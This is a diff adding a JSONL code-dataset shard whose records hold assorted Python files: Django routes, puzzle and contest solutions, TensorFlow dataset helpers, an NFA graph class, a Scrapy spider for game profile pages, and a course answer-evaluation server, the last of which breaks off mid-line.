diff --git "a/786.jsonl" "b/786.jsonl" new file mode 100644--- /dev/null +++ "b/786.jsonl" @@ -0,0 +1,621 @@ +{"seq_id":"563448380","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n #url(r'^curriculum_retrieval', views.curriculum_retrieval, name='curriculum_retrieval'),\n url(r'^$', views.index, name='index'),\n url(r'^initialize', views.initialize, name='initialize'),\n url(r'^retrieve_text', views.retrieve_text, name='retrieve_text'),\n url(r'^wrong_and_return', views.wrong_and_return, name='wrong_and_return'),\n url(r'^translate', views.translate, name='translate'),\n]\n","sub_path":"chatbot/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"519275940","text":"from time import time\nfrom random import random\n\nlimit_secs = 2\nstart_time = time()\n\nD = int(input())\nc = list(map(int, input().split()))\ns = [list(map(int, input().split())) for _ in range(D)]\n\ndef calc_score(t):\n score = 0\n S = 0\n last = [-1] * 26\n for d in range(len(t)):\n S += s[d][t[d]]\n last[t[d]] = d\n for i in range(26):\n S -= c[i] * (d - last[i])\n score += max(10 ** 6 + S, 0)\n return score\n\ndef solution1():\n return [i % 26 for i in range(D)]\n\ndef solution2():\n t = None\n score = -1\n for i in range(26):\n nt = [(i + j) % 26 for j in range(D)]\n if calc_score(nt) > score:\n t = nt\n return t\n\ndef solution3():\n t = []\n for _ in range(D):\n score = -1\n best = -1\n t.append(0)\n for i in range(26):\n t[-1] = i\n new_score = calc_score(t)\n if new_score > score:\n best = i\n score = new_score\n t[-1] = best\n return t\n\ndef optimize0(t):\n return t\n\ndef optimize1(t):\n score = calc_score(t)\n while time() - start_time + 0.15 < limit_secs:\n d = int(random() * D)\n old = t[d]\n t[d] = int(random() * 26)\n new_score = calc_score(t)\n if new_score < score:\n t[d] = old\n else:\n score = new_score\n return t\n\ndef optimize2(t):\n score = calc_score(t)\n while time() - start_time + 0.15 < limit_secs:\n d1 = int(random() * D)\n q1 = int(random() * 26)\n d2 = int(random() * D)\n q2 = int(random() * 26)\n old1 = t[d1]\n old2 = t[d2]\n t[d1] = q1\n t[d2] = q2\n new_score = calc_score(t)\n if new_score < score:\n t[d2] = old2\n t[d1] = old1\n else:\n score = new_score\n return t\n\n\nt = solution3()\nt = optimize2(t)\nprint('\\n'.join(str(e + 1) for e in t))\n","sub_path":"Python_codes/p02618/s387804488.py","file_name":"s387804488.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"579630222","text":"# django imports\nfrom django import forms\nfrom django.forms import MultiWidget\n\n\ndef hourloop():\n empty = []\n for x in range(0, 24):\n x = str(x)\n x = x.zfill(2)\n empty.append((x, x))\n return empty\n\n\ndef minutesloop():\n empty = []\n for x in range(0, 60):\n x = str(x)\n x = x.zfill(2)\n empty.append((x, x))\n return empty\n\nhours = hourloop()\nminutes = minutesloop()\n\n\nclass HourWidget(MultiWidget):\n\n def __init__(self, *args, **kwargs):\n widgets = (\n forms.Select(choices=hours),\n forms.Select(choices=minutes)\n )\n super(HourWidget, self).__init__(widgets, *args, **kwargs)\n\n def decompress(self, value):\n if value:\n return value\n return [None, None]\n\n def value_from_datadict(self, data, files, name):\n time_list = [\n widget.value_from_datadict(data, files, name + '_%s' % i)\n for i, widget in enumerate(self.widgets)]\n\n hour = time_list[0]\n minute = time_list[1]\n time = (hour + ':' + minute)\n return str(time)\n\n def format_output(self, rendered_widgets):\n return (rendered_widgets[0] + \":\" + rendered_widgets[1])","sub_path":"events/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"318145874","text":"import math\r\nx=eval(input('请输入小于1000的正整数:'))\r\nassert x<1000\r\ny=0\r\nfor i in range(2,int(math.sqrt(x))+1):\r\n if x%i==0:\r\n print(\"%d\"%i,'*','%d'%(x/i),'=',\\\r\n '%d'%x)\r\n y=1\r\nif y==0:\r\n print('不可因式分解')\r\nkkk=eval(input())","sub_path":"Python代码/因式分解.py","file_name":"因式分解.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"620493630","text":"import time\nimport sys\n\nsys.setrecursionlimit(5000)\n\nlines = open(\"day17.input\", \"r\").read().rstrip().split(\"\\n\")\n\ndef print_grid():\n for line in grid:\n l = \"\"\n for e in line:\n if e == '.':\n l += e\n elif e == '#':\n l += '\\x1b[0;37;41m' + e + '\\x1b[0m'\n elif e == '+':\n l += '\\x1b[0;37;46m' + e + '\\x1b[0m'\n elif e == '~':\n l += '\\x1b[0;37;44m' + e + '\\x1b[0m'\n print(l)\n\nveins = []\nfor line in lines:\n v = {}\n for half in line.split(\", \"):\n coord, rng = half.split(\"=\")\n if '..' in rng:\n c1, c2 = [int(e) for e in rng.split(\"..\")]\n v[coord] = range(c1, c2+1)\n else:\n v[coord] = [int(rng)]\n veins.append(v)\n\nbounds = [500, 500, 0, 0]\n\nfor vein in veins:\n bounds[0] = min(bounds[0], min(vein['x']))\n bounds[1] = max(bounds[1], max(vein['x']))\n bounds[2] = min(bounds[2], min(vein['y']))\n bounds[3] = max(bounds[3], max(vein['y']))\n\nbounds[0] -= 1\nbounds[1] += 1\n\ngrid = [['.' for i in range(bounds[0], bounds[1]+1)] for j in range(bounds[2], bounds[3]+1)]\n\nfor vein in veins:\n for y in vein['y']:\n for x in vein['x']:\n grid[y-bounds[2]][x-bounds[0]] = '#'\n\ngrid[0-bounds[2]][500-bounds[0]] = '+'\n\ndef flow_water(pos, spreading):\n try:\n x, y = pos\n gx, gy = x-bounds[0], y-bounds[2]\n grid[gy][gx] = '+'\n #print_grid()\n #print(\"\\n\")\n #time.sleep(.2)\n if y == bounds[3]:\n return True\n if grid[gy+1][gx] == '+':\n return True\n if grid[gy+1][gx] == '.':\n #parent[(x, y+1)] = pos\n if flow_water((x, y+1), False):\n return True\n if grid[gy][gx-1] == '.':\n #parent[(x-1, y)] = pos\n l = flow_water((x-1, y), True)\n else:\n l = False\n if grid[gy][gx+1] == '.':\n #parent[(x+1, y)] = pos\n r = flow_water((x+1, y), True)\n else:\n r = False\n flowing = l or r\n if not flowing and not spreading:\n xx = gx\n while xx >= 0 and grid[gy][xx] == '+':\n grid[gy][xx] = '~'\n xx -= 1\n xx = gx+1\n while xx < len(grid[gy]) and grid[gy][xx] == '+':\n grid[gy][xx] = '~'\n xx += 1\n return flowing\n except Exception as e:\n print(e)\n print_grid()\n exit(0)\n\nflow_water((500, 0), False)\n\nctr = 0\ncount = False\nfor line in grid:\n for e in line:\n if e == '#':\n count = True\n if e in '+~' and count:\n ctr += 1\n\nprint(ctr)\n","sub_path":"day17/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"190313214","text":"import tensorflow as tf\n\n\ndef simple_dataset(training_samples, batch_size, shuffle_buffer=0, cache=True):\n \"\"\"\n prepare a dataset from numpy array without applying a function to it\n Args:\n training_samples: numpy array of training samples, shape: [num_samples,num_vUnits]\n batch_size: size of a mini-batch, int\n shuffle_buffer: number of examples that are shuffled simultaniously, 0 means no shuffeling\n cache: whether to cache the dataset, should be set to False only for large datasets\n Returns:\n dataset: (shuffled) and batched dataset\n \"\"\"\n dataset = tf.data.Dataset.from_tensor_slices(training_samples)\n if shuffle_buffer != 0:\n dataset = dataset.shuffle(buffer_size=shuffle_buffer)\n dataset = dataset.batch(batch_size)\n dataset = dataset.prefetch(buffer_size=1)\n if cache is True:\n dataset = dataset.cache()\n return dataset\n\n\ndef flatten1(x):\n \"\"\"\n flatten tensor x\n -> results in [sample_ch1,sample_ch2,sample_ch3,sample_ch1,sample_ch2,...]\n \"\"\"\n flat = tf.reshape(x, [-1])\n return flat\n\n\ndef flatten2(x):\n \"\"\"\n flatten tensor x, column major\n -> results in [samples_ch1,samples_ch2,samples_ch3]\n \"\"\"\n flat = tf.reshape(tf.transpose(x), [-1])\n return flat\n\n\ndef sliding_window_dataset(training_samples, window_size, batch_size, stride=1, num_cores=4):\n \"\"\"\n prerpare a dataset by slinding an input window over the samples\n Args:\n training_samples: numpy array of training samples, shape: [num_samples,num_channels]\n batch_size: size of a mini-batch, int\n num_cores: number of CPU cores available in the system\n Returns:\n dataset: (shuffled) and batched sliding window dataset\n \"\"\"\n dataset = tf.data.Dataset.from_tensor_slices(training_samples)\n if stride != 0:\n dataset = dataset.apply(tf.contrib.data.sliding_window_batch(window_size, stride=stride))\n else:\n dataset = dataset.batch(window_size)\n dataset = dataset.map(map_func=flatten2, num_parallel_calls=num_cores)\n dataset = dataset.batch(batch_size)\n return dataset\n\n\ndef make_one_hot_window_label(sliding_window_sample):\n \"\"\"\n helper function for sliding_window_dataset_labels,\n casts labels to one hot lables and then transforms a window with window_size labels\n into just a single label for the whole window\n \"\"\"\n one_hot_labels = tf.one_hot(sliding_window_sample, depth=5, dtype=tf.int32)\n reshaped = tf.reshape(one_hot_labels, [-1, one_hot_labels.shape[-1]])\n mean = tf.reduce_mean(tf.cast(reshaped, tf.float32), axis=0)\n _, ind = tf.nn.top_k(mean, k=1)\n one_hot_label = tf.scatter_nd([ind], [1], shape=mean.shape)\n return one_hot_label\n\n\ndef sliding_window_dataset_labels(one_hot_labels, window_size, batch_size, stride=1, num_cores=4):\n \"\"\"\n prerpare a dataset by sliding an input window over the labels\n Args:\n one_hot_labels: numpy array of training labels, shape: [num_samples,num_classes]\n batch_size: size of a mini-batch, int\n num_cores: number of CPU cores available in the system\n Returns:\n dataset: (shuffled) and batched sliding window dataset\n \"\"\"\n dataset = tf.data.Dataset.from_tensor_slices(one_hot_labels)\n if stride != 0:\n dataset = dataset.apply(tf.contrib.data.sliding_window_batch(window_size, stride=stride))\n else:\n dataset = dataset.batch(window_size)\n dataset = dataset.map(map_func=make_one_hot_window_label, num_parallel_calls=num_cores)\n dataset = dataset.batch(batch_size)\n return dataset\n\n\ndef _bytes_feature(value):\n \"\"\"\n helper function to convert value into a bytes feature\n \"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef write_to_TFRecord(file_name, keys_and_raw_features):\n \"\"\"\n write features to TFRecords file\n Args:\n file_name: name of TFRecords file\n keys_and_raw_features: dictionary, where keys are the names of the features\n and the corresponding values are the features\n \"\"\"\n # open the TFRecords file\n writer = tf.python_io.TFRecordWriter(file_name)\n for i in range(len(keys_and_raw_features[list(keys_and_raw_features.keys())[0]])):\n feature = {}\n for key in keys_and_raw_features.keys():\n value = keys_and_raw_features[key][i].tobytes()\n feature[key] = _bytes_feature(value)\n # Create an example protocol buffer\n example = tf.train.Example(features=tf.train.Features(feature=feature))\n # Serialize to string and write to the file\n writer.write(example.SerializeToString())\n writer.close()\n\n\ndef dataset_from_TFRecords(file_name, batch_size, keys, data_types, shuffle_buffer=0, parallel_reads=1, num_cores=4):\n \"\"\"\n returns features with names specified in keys with types from data_types\n Args:\n file_name: name of TFRecords file, string\n batch_size: size of one mini-batch, int\n keys: keys of the features to load, list of strings\n data_types: list of datatypes corresponding to keys, list of strings ('float32' or 'int32')\n (must be the datatypes which where used when writing the file!!)\n shuffle_buffer: number of examples that are shuffled simultaniously, 0 means no shuffling\n parallel_reads: number of files that are read in parallel, int\n num_cores: number of CPU cores available in the system\n \"\"\"\n\n def parse(serialized):\n \"\"\"\n helper function: convert dataset from TFRecords file\n \"\"\"\n features = {}\n for key in keys:\n features[key] = tf.FixedLenFeature([], tf.string)\n\n # Parse the serialized data so we get a dict with our data.\n parsed_example = tf.parse_single_example(serialized=serialized,\n features=features)\n results = []\n for i in range(len(keys)):\n key = keys[i]\n dtype = data_types[i]\n # Get the image as raw bytes.\n raw_feature = parsed_example[key]\n # Decode the raw bytes so it becomes a tensor with type.\n if dtype == 'float32':\n result_feature = tf.decode_raw(raw_feature, tf.float32)\n else:\n result_feature = tf.decode_raw(raw_feature, tf.int32)\n results.append(result_feature)\n return results\n\n dataset = tf.data.TFRecordDataset(file_name, num_parallel_reads=parallel_reads)\n dataset = dataset.map(map_func=parse, num_parallel_calls=num_cores)\n if shuffle_buffer != 0:\n dataset = dataset.shuffle(buffer_size=shuffle_buffer)\n if batch_size > 1:\n dataset = dataset.batch(batch_size)\n return dataset\n\n\ndef make_LSH_values_and_indicies(batch, random_binary_matrix, num_KCs, p_WTA, return_WTA_matrix=False):\n \"\"\"\n return values and indicies of WTA_activation\n Args:\n batch: batch to calculate WTA activations from, shape [batch_size,num_vUnits]\n random_binary_matrix: matrix that connects input to Kenyon cells,\n tensorflow constant, shape [num_vUnits,num_KCs]\n num_KCs: number of Kenyon cells, int\n p_WTA: percentage of KCs that do not get silicend, float\n return_WTA_matrix: whether to calculate the WTA_matrix (for testing purposes), bool\n Returns:\n WTA_values: values of WTA units, shape [batch_size,num_activations]\n WTA_indices_flat: indices of WTA units, shape [batch_size,num_activations]\n \"\"\"\n num_activations = int(p_WTA * num_KCs)\n activation_KCs = tf.matmul(batch, random_binary_matrix)\n WTA_values, WTA_indices_flat = tf.nn.top_k(activation_KCs, k=num_activations)\n if return_WTA_matrix is True:\n batch_size = tf.shape(batch)[0]\n WTA_indices = tf.stack([tf.stack([tf.range(start=0, limit=batch_size) for i in range(num_activations)], axis=1),\n WTA_indices_flat], axis=-1)\n WTA_indices = tf.reshape(WTA_indices, [-1, 2])\n WTA_values_flat = flatten1(WTA_values)\n activation_WTAs = tf.scatter_nd(WTA_indices, WTA_values_flat, shape=[batch_size, num_KCs])\n return activation_WTAs, WTA_values, WTA_indices_flat\n else:\n return WTA_values, WTA_indices_flat\n\n\ndef WTA_activations_from_values_and_indices(values, indices, num_KCs, p_WTA):\n \"\"\"\n get WTA matrix from values and indicies\n Args:\n values: values of WTA units, shape [batch_size,num_activations]\n indices: indices of WTA units, shape [batch_size,num_activations]\n num_KCs: number of Kenyon cells, int\n p_WTA: percentage of WTA cells, float\n Returns:\n WTA_rec: reconstructed matrix, shape [batch_size,num_KCs]\n \"\"\"\n num_activations = int(p_WTA * num_KCs)\n batch_size = tf.shape(values)[0]\n indices = tf.stack([tf.stack([tf.range(start=0, limit=batch_size) for i in range(num_activations)], axis=1),\n indices], axis=-1)\n values = flatten1(values)\n indices = tf.reshape(indices, [-1, 2])\n WTA_rec = tf.scatter_nd(indices, values, shape=[batch_size, num_KCs])\n return WTA_rec\n\n\ndef WTA_activations_from_values_and_indices_map_fn(values, indices, labels):\n \"\"\"\n same as WTA_activations_from_values_and_indices but for a dataset\n \"\"\"\n num_KCs = 16 * 3 * 256\n p_WTA = 0.05\n\n num_activations = int(p_WTA * num_KCs)\n batch_size = tf.shape(values)[0]\n indices = tf.stack([tf.stack([tf.range(start=0, limit=batch_size) for i in range(num_activations)], axis=1),\n indices], axis=-1)\n values = flatten1(values)\n indices = tf.reshape(indices, [-1, 2])\n WTA_rec = tf.scatter_nd(indices, values, shape=[batch_size, num_KCs])\n return WTA_rec, labels\n","sub_path":"train/make_datasets.py","file_name":"make_datasets.py","file_ext":"py","file_size_in_byte":9763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"364240369","text":"from .NodeGenerator import NodeGenerator\nfrom .node import *\nimport queue\nimport copy\n# this class represents a single NFA that has a start node and maybe 0 or more accept (finish) nodes\n\nclass Graph:\n\n def __init__(self , char, start = None, finish = None):\n # constructor makes a simple start node and accept state connected by an edge\n node_generator = NodeGenerator.getInstance()\n if(start == None):\n self.start_node = node_generator.make_node(isStart = True)\n self.accept_state = node_generator.make_node(isFinish = True)\n self.start_node.add_destination_node(char, self.accept_state)\n self.all_accept_states=[]\n\n else: # make custom non-simple graphs (like ones after operations)\n self.start_node = start\n self.accept_state = finish\n self.start_node.add_destination_node(char, self.accept_state)\n self.all_accept_states = []\n\n def get_start(self):\n return self.start_node\n\n def get_all_accept(self):\n return self.all_accept_states\n\n def get_accept(self):\n return self.accept_state\n\n # needs modification\n def bfs(self): # returns list of finishes (accept states)\n q = queue.Queue()\n q.put(self.start_node)\n finishes = []\n print(\"bfs starts\\n\")\n while not q.empty():\n top = q.get()\n if top.isFinish:\n finishes.append(top)\n for i in top.edges:\n q.put(i[0])\n print(i[1])\n return finishes\n\n def go(self,cur,s,visited = []):\n\n # print(s,cur.names,cur.id)\n if visited.count(cur.id):\n return\n\n if cur.isFinish:\n print(s , cur.names,cur.id)\n return\n\n visited.append(cur.id)\n\n\n for i in cur.edges:\n z = s\n # z.append([i[1],[i for i in i[0].names],cur.id])\n z.append([cur.id,i[1],i[0].id])\n self.go(i[0],z)\n z.pop()\n\n visited.pop()\n\n def dfs(self): # displaying all patterns in nfa\n print(\"dfs starts\\n\")\n self.go(self.start_node,[])\n\n @staticmethod\n def mergeOr(graphs):\n g = Graph(\"@\")\n g.start_node.clearEdges()\n for i in graphs:\n g.start_node.add_destination_node(\"@\",i.start_node)\n i.start_node.isStart = 0\n i.accept_state.add_destination_node(\"@\",g.accept_state)\n i.accept_state.isFinish = 0\n for j in i.start_node.names:\n g.start_node.names.add(j)\n g.accept_state.names.add(j)\n return g\n\n @staticmethod\n def mergeConcatenate(graphs):\n a = graphs[0]\n b = graphs[1]\n a.accept_state.add_destination_node(\"@\",b.start_node)\n a.accept_state.isFinish = 0\n a.accept_state = b.accept_state\n return a\n\n @staticmethod\n def gClone(graph):\n return copy.deepcopy(graph)\n\n @staticmethod\n def dgClone(dic_graphs):\n dic_g ={}\n for key, value in dic_graphs.items():\n dic_g[key]= Graph.gClone(value)\n return dic_g\n @staticmethod\n def keenClosure(graph):\n \"\"\"\n uses the kleen closure operator on a graph to produce a new graph using thompson algorithm\n :param graph: a graph\n :return:\n \"\"\"\n new_graph = Graph(\"@\")\n graph = Graph.gClone(graph)\n # add new start\n new_graph.start_node.add_destination_node(\"@\", graph.start_node)\n graph.start_node.isStart = False\n # add new finish with edge epsilon\n graph.accept_state.add_destination_node(\"@\", new_graph.accept_state)\n graph.accept_state.isFinish = False\n # repeat more than once\n graph.accept_state.add_destination_node(\"@\", graph.start_node)\n\n return new_graph\n\n @staticmethod\n def keenClosurePlus(graph):\n \"\"\"\n uses the positive closure operator on a graph to produce a new graph using thompson algorithm\n :param graph: a graph\n :return:\n \"\"\"\n new_graph = Graph(\"@\")\n new_graph.start_node.clearEdges()\n graph = Graph.gClone(graph)\n # add new start\n new_graph.start_node.add_destination_node(\"@\", graph.start_node)\n graph.start_node.isStart = False\n # add new finish with edge epsilon\n graph.accept_state.add_destination_node(\"@\", new_graph.accept_state)\n graph.accept_state.isFinish = False\n # repeat more than once\n graph.accept_state.add_destination_node(\"@\", graph.start_node)\n\n return new_graph\n\n# if __name__ == '__main__':\n# # just messin around\n# a = Node(1)\n# c = Node(1)\n# b = Node(1)\n# d = Node(1)\n# a.add_edge(c,\"hamada\")\n# a.add_edge(d,\"adel\")\n# c.add_edge(b,\"rewesh\")\n# d.add_edge(b,\"not rewesh\")\n# g = Graph(a,[b])\n# g.bfs()\n# g.dfs()\n#\n","sub_path":"tokenizer/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"2405140","text":"import scrapy\nimport json\nimport re\nimport io\nimport json\nfrom natsort import natsorted, ns\nimport statistics \n\nclass CharSpider(scrapy.Spider):\n name = \"chars\"\n\n start_urls = []\n\n baseurl = 'https://new.margonem.pl/profile/view,'\n\n json_file = open('./tutorial/general_stats/id_list_total.json')\n json_str = json_file.read()\n json_data = json.loads(json_str)\n\n # for i in json_data:\n # start_urls.append(baseurl+str(i))\n\n for i in reversed(json_data):\n if i > 9000000:\n start_urls.append(baseurl+str(i))\n\n\n # for i in range(1498500,1499523):\n # start_urls.append(baseurl+str(i))\n\n def parse(self, response):\n is_public_checker = response.xpath('.//div[@class=\"character-list\"]/h3/text()').get()\n is_public_checker = is_public_checker.strip()\n\n if is_public_checker != \"Światy publiczne\":\n return\n\n chars = response.xpath('.//div[@class=\"character-list\"][1]//ul/*')\n name = response.xpath('//h2/span/text()').get()\n name = name.lstrip()\n name = name.rstrip()\n\n days = response.xpath('.//div[@class=\"profile-header-data\"][6]//div[@class=\"value\"]/text()').get()\n days = days.replace(' ', '')\n days = int(days)\n\n posts = response.xpath('.//div[@class=\"profile-header-data\"][1]//div[@class=\"value\"]/text()').get()\n posts = posts.replace(' ', '')\n posts = int(posts)\n\n page = response.url.split(\",\")[-1]\n\n # char includes profession, while lvl does not\n char_list = [] \n lvl_list = []\n\n for char in chars:\n lvl = char.xpath('@data-lvl').get()\n prof = char.xpath('input[@class=\"chprof\"]/@value').get()\n char_list.append(lvl + prof)\n lvl_list.append(int(lvl))\n\n #natsorted(char_list, key=lambda y: y.lower())\n char_list.sort(key = lambda y: int(y[0:-1]), reverse = True)\n \n total = 0\n multiplier = 1.85\n increment = 0.2\n reduce_increment = 0.04\n for char in char_list:\n lvl = char[0:-1]\n if int(lvl) > 20:\n total += (int(lvl)-20)**multiplier\n multiplier += increment\n increment -= reduce_increment\n if increment < 0:\n increment = 0\n\n total = total/(days+3.5)\n\n if posts > 0:\n total *= 0.75\n\n\n lvl_list = list(filter(lambda x: x > 10, lvl_list))\n variance = \"null\"\n if len(lvl_list) > 1:\n variance = statistics.variance(lvl_list)\n variance += 1.7\n variance = variance*(20+days**1.05)/20\n variance = round(variance,2)\n \n \n if total > 300 or variance < 10:\n yield{\n 'id': int(page),\n 'name': name,\n 'days': days,\n 'char_list': char_list,\n 'total': round(total,2),\n 'variance': variance\n }\n","sub_path":"tutorial/spiders/char_scraper.py","file_name":"char_scraper.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"513465445","text":"'''\nThe count-and-say sequence is the sequence of integers with the first five terms as following:\n\n1. 1\n2. 11\n3. 21\n4. 1211\n5. 111221\n1 is read off as \"one 1\" or 11.\n11 is read off as \"two 1s\" or 21.\n21 is read off as \"one 2, then one 1\" or 1211.\nGiven an integer n, generate the nth term of the count-and-say sequence.\n\nNote: Each term of the sequence of integers will be represented as a string.\n\nExample 1:\nInput: 1\nOutput: \"1\"\n\nExample 2:\nInput: 4\nOutput: \"1211\"\n'''\n# 2018-6-20\n# Count and Say\n# it can also use loop to resolve\nclass Solution:\n def countAndSay(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n return self.subHandle(1,n,'1')\n\n def subHandle(self,s,n,r):\n if s >= n:\n return r\n i = 0\n r += '#'\n tmp = ''\n c = 1\n while i < len(r) - 1:\n if r[i] == r[i+1]:\n c += 1\n else:\n tmp += str(c) + r[i]\n c = 1\n i += 1\n # print(s,n,r,tmp)\n r = tmp\n return self.subHandle(s+1,n,r)\n\nn = 20\ntest = Solution()\nres = test.countAndSay(n)\nprint(res)\n","sub_path":"LeetCode/python/38_easy_Count and Say.py","file_name":"38_easy_Count and Say.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"124652386","text":"#!/usr/bin/env python3\n\nfrom typing import Any, Optional, Iterator, Tuple, Union, Dict, List, TypeVar\nfrom aiohttp import web\nfrom glob import glob\nimport asyncio\nimport enum\nimport signal\nimport multidict\nimport time\nimport sys\nimport os.path\nimport testenv\nimport traceback\nimport socket\nimport textwrap\nimport aiohttp_mako # type: ignore\nimport yaml\nimport re\nimport html\n\nimport config\nimport cgroup\nimport functor\nimport admin\n\n\nta = TypeVar(\"ta\")\nQSET_RE = re.compile(r\"/el/(?P[^/]*)/(?P[^/]*)/(?P[^/]*)/odp/tb/(?P.*[.]qdefx)\") # noqa: E501\n\n\nclass PostOrGet:\n \"\"\"\n A wrapper for accessing either POST or GET (query) arguments in an uniform\n way. Please do not use the constructor, use coroutine 'create'.\n Prefers POST.\n \"\"\"\n\n def __init__(self):\n \"\"\"Creates an empty PostOrGet, do not use directly, use 'create'\"\"\"\n self.post : Optional[multidict.MultiDictProxy] = None\n self.query : Optional[multidict.MultiDictProxy] = None\n\n @staticmethod\n async def create(request : web.Request):\n self = PostOrGet()\n self.post = await request.post()\n self.query = request.query\n return self\n\n def get(self, key : str, default : str = None) -> str:\n \"\"\"\n Gets value for given key, prefering post parameters and falling back to\n query if needed.\n \"\"\"\n assert self.post is not None\n assert self.query is not None\n try:\n v = self.post[key]\n assert isinstance(v, str)\n return v\n except KeyError:\n return self.query.get(key, default)\n\n def items(self) -> Iterator[Tuple[str, Any]]:\n \"\"\"Iterates over all post and query parameters\"\"\"\n assert self.post is not None\n assert self.query is not None\n yield from self.post.items()\n yield from self.query.items()\n\n\nclass InvalidInput(Exception):\n pass\n\n\nclass MissingField(InvalidInput):\n def __init__(self, name, key):\n InvalidInput.__init__(self, f\"Evaluator error: \"\n f\"Missing mandatory parameter `{key}' ({name})\")\n\n\nclass InterfaceMode (enum.Flag):\n Null = 0\n IS = enum.auto()\n Priviledged = enum.auto()\n\n\nclass EvalTask:\n @staticmethod\n def parse_qid(qid : str) -> Tuple[Optional[str], Optional[str]]:\n if qid is None:\n return (None, None)\n s = qid.split(\"?\", 1)\n if len(s) == 1:\n return (s[0], None)\n return (s[0] or None, s[1])\n\n def __init__(self, data : PostOrGet, mode : InterfaceMode):\n def ifis(a : ta, b : Optional[ta] = None) -> ta:\n if InterfaceMode.IS in mode or b is None:\n return a\n return b\n\n def getMandatory(a : str, b : Optional[str] = None,\n info : Optional[str] = None) -> str:\n key = ifis(a, b)\n v = data.get(key)\n if v is None:\n raise MissingField(info or b, key)\n return v\n\n self.course_id = getMandatory(\"kod\", \"course_id\", \"course ID\").lower()\n self.question_id, self.option = EvalTask.parse_qid(getMandatory(\"id\"))\n self.answer = getMandatory(\"odp\", \"answer\")\n self.student_id = ifis(functor.mapO(functor.readInt, data.get(\"uco\")),\n None)\n self.view_only = ifis(data.get(\"zobrazeni\") == \"p\", False)\n self.qset = None\n\n if InterfaceMode.IS in mode:\n self.qset = os.path.normpath(data.get(\"sada\", \"NO_QSET_GIVEN\"))\n qset_match = QSET_RE.fullmatch(self.qset)\n if qset_match:\n self.course_id = qset_match.group('course').lower()\n elif InterfaceMode.Priviledged in mode:\n raise InvalidInput(\n f\"Questionare `{self.qset}' is not authorized\")\n\n if self.question_id is None and self.option is None:\n raise MissingField(\"question ID\", \"id\")\n\n\nasync def handle_evaluation(conf : config.Config, slots : cgroup.SlotManager,\n data : PostOrGet, mode : InterfaceMode)\\\n -> Tuple[bool, str, List[testenv.PointEntry]]:\n try:\n task = EvalTask(data, mode)\n\n course = conf.courses.get(task.course_id)\n if course is None:\n raise InvalidInput(f\"Course {task.course_id} not defined\")\n if InterfaceMode.Priviledged not in mode and not course.hint:\n raise InvalidInput(\n \"This course does not allow unathorized (hint) access\")\n\n question : Optional[str] = None\n if task.question_id is not None:\n if os.path.isabs(task.question_id) or task.question_id[0:1] == '.':\n raise InvalidInput(f\"Invalid question ID {task.question_id}\")\n qglobs = glob(os.path.join(course.qdir, f\"{task.question_id}.q*\"))\n question_candidates = list(filter(os.path.isfile, qglobs))\n\n if len(question_candidates) == 0:\n raise InvalidInput(\"No questions found for ID \"\n f\"{task.question_id}\", qglobs)\n if len(question_candidates) > 1:\n raise InvalidInput(\"Too many questions found for ID \"\n f\"{task.question_id} \"\n f\"({question_candidates})\")\n question = question_candidates[0]\n\n async with testenv.TestEnvironment(question, task.answer,\n course, slots) as env:\n run_res = await env.run(task.option,\n hint=InterfaceMode.Priviledged not in mode)\n\n log = 80 * \"=\"\n log += textwrap.dedent(f\"\"\"\n date: {time.asctime()}\n course_id: {task.course_id}\n question_id: {task.question_id}\n option: {task.option}\n qdir: {course.qdir}\n question: {question}\n student_id: {task.student_id}\n qset: {task.qset}\n view_only: {task.view_only}\n interface_mode: {mode}\n answer: |\n \"\"\")\n log += textwrap.indent(task.answer, \" \")\n log += \"\\nlog: |\\n\"\n log += textwrap.indent(run_res.stderr, \" \")\n log += \"\\n\"\n log += yaml.safe_dump({\"points\":\n [p.__dict__ for p in run_res.points]})\n log += f\"\\nresult: {run_res.result}\\nreply: |\\n\"\n log += textwrap.indent(run_res.stdout, \" \")\n print(log, file=sys.stderr, flush=True)\n\n output = run_res.stdout\n if InterfaceMode.IS in mode and course.escape_is:\n output = \"
\\n\" \\\n                         f\"{html.escape(output, quote=True)}
\"\n\n return (run_res.result, output, run_res.points)\n\n except InvalidInput as ex:\n print(f\"ERROR: {ex}\", file=sys.stderr)\n return (False, str(ex), [])\n except Exception as ex:\n traceback.print_exc()\n return (False, f\"Error while evaluating: {ex}\", [])\n\n\ndef get_eval_handler(eval_sem : asyncio.BoundedSemaphore, conf : config.Config,\n slots : cgroup.SlotManager, mode : InterfaceMode):\n headers : Dict[str, str] = {}\n if InterfaceMode.Priviledged not in mode and conf.hint_origin is not None:\n headers[\"Access-Control-Allow-Methods\"] = \"POST\"\n headers[\"Access-Control-Allow-Origin\"] = conf.hint_origin\n\n async def handle_eval(request : web.Request) -> web.Response:\n async with eval_sem:\n start = time.perf_counter()\n data = await PostOrGet.create(request)\n (result, comment, points) = await handle_evaluation(conf, slots,\n data, mode)\n end = time.perf_counter()\n print(f\"Handled in {end - start}\", file=sys.stderr, flush=True)\n\n if InterfaceMode.IS not in mode:\n dpoints = [p.__dict__ for p in points]\n return web.json_response({\"result\": result,\n \"comment\": comment,\n \"points\": dpoints},\n headers=headers)\n else:\n tpoints = 